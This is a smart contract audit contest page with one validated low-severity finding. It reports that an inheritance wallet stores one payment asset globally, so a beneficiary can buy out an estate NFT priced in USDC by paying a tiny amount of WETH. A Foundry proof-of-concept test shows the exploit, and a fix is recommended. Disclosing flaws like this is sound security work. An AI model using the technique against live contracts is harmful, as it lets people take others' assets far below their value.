Inheritable Smart Contract Wallet

First Flight #35

Beginner FriendlySolidity

100 EXP

View results

Previous Next

Submission Details

Severity: low

Valid

NFT asset not stored per NFT - Beneficiary can buy out NFT at low price.

nypet

Summary

The NFT's asset (currency) is not stored per NFT, one asset is stored globally for an inheritance manager. This results in several erronous calculations, and possible exploits.

Vulnerability Details

If more than one NFT is created, then the last NFT created will determine the asset type used during buy-out. If previous NFTs were created with a different asset this will result in wrongly calculated payments.

E.g. the next test demonstrates a scenario, where the initial owner of the InheritanceManager created two NFT-s, one representing a family residency worth of_ 3_000_000 _USDC, and one representing a car worth of 3 WETH. As the test demonstrates, a beneficiary can buy out the residency paying olny 0,000003 WETH (note that USDC has only 6 decimals, whilte WETH has 18).

function testCanBoyoutNFTUnderPriceInCaseOfTwoCurrencies() public{

address aladar = makeAddr("aladar");

address bloki = makeAddr("bloki");

address geza = makeAddr("geza");

vm.startPrank(owner);

im.addBeneficiery(aladar);

im.addBeneficiery(bloki);

im.addBeneficiery(geza);

im.createEstateNFT("Family Residency", 3_000_000 * 10**6, address(usdc)); //3_000_000 USDC

im.createEstateNFT("Prosche Carrera", 3 * 10**18, address(weth)); //3 WETH

vm.stopPrank();

vm.warp(1 + 90 days);

weth.mint(aladar, 3_000_000 * 10**6); // 0,000003 ETH !!!

vm.startPrank(aladar);

weth.approve(address(im), 2_000_000*10**6); // aladar will send only 0,000002 ETH !!!

im.inherit();

im.buyOutEstateNFT(1);

vm.stopPrank();

assertEq(1_000_000*10**6, weth.balanceOf(aladar));

}

Impact

A beneficiary can buyout nft-s at a much lower price then inteded. This breaks the contract's core logic.

Tools Used

Manaul review, foundry test.

Recommendations

Store assets per nft-s (e.g. in a mapping), just like NFT prices.

Updates

Lead Judging Commences

0xtimefliez Lead Judge 6 months ago

Submission Judgement Published

Validated

Assigned finding tags:

global asset in NFT values

Rewards breakdown

nSLOC

211

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.